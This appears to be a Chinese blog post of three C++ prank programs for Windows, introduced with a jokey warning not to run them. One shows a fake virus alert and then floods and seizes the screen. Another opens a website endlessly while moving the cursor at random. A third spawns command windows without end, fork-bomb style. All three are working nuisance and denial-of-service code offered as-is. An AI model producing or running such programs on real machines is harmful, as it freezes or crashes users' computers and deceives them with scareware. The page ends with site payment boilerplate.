请勿运行以下软件,我试过,否则了(●‘◡‘●)

1

#include<iostream>
#include<conio.h>
#include<windows.h>
using namespace std;
void ss()
{
    HWND hwnd = GetForegroundWindow();
            int cx = GetSystemMetrics(SM_CXSCREEN);//需要根据电脑的大小设置加减
            int cy = GetSystemMetrics(SM_CYSCREEN);//需要根据电脑的大小设置加减
            LONG_PTR last_style=GetWindowLongPtr(hwnd,GWL_STYLE);
            RECT last_rect;
            GetWindowRect(hwnd,&last_rect);
            LONG l_WinStyle = GetWindowLong(hwnd,GWL_STYLE);
            SetWindowLong(hwnd,GWL_STYLE,(l_WinStyle | WS_POPUP | WS_MAXIMIZE)& ~WS_CAPTION & ~WS_THICKFRAME & ~WS_BORDER);
            SetWindowPos(hwnd, NULL, 0, 0, cx, cy, 0);
            UpdateWindow(hwnd);
}
int main()
{
    /*int n,a=2;
    cin>>n;
    while(a<=n)
    {
        cout<<a<<" ";
        a+=2;
    }*/
    cout<<":(\n电脑发现病毒!是否杀除?\n是(T)\n否(F)";
    char m=getch();
    if(m=='t')
    {
        system("cls");
        cout<<":)\n杀毒成功!";
        return 0;
    }
    if(m=='f')
    {
        system("color 41");
        for(int i=1;i<=10000000;i--)
        {
            cout<<"ut54yj8t4f549yu&*($^F%Vgi345^&";
            ss();
        }
        exit(11111111111111111111111);
    }
    return 0;
}

2
 
#include <bits/stdc++.h>
#include <windows.h>
 
using namespace std;
 
int main() {
    while(1) {
        system("start https://www.csdn.net/");
        SetCursorPos(rand()%1000,rand()%1000);
    }
}

3

#include<windows.h>
using namespace std;
int main()
{
    system("color F5");
    for(;;) system("start cmd");
    return 0;
}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

404程序猿

你的鼓励将是我最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值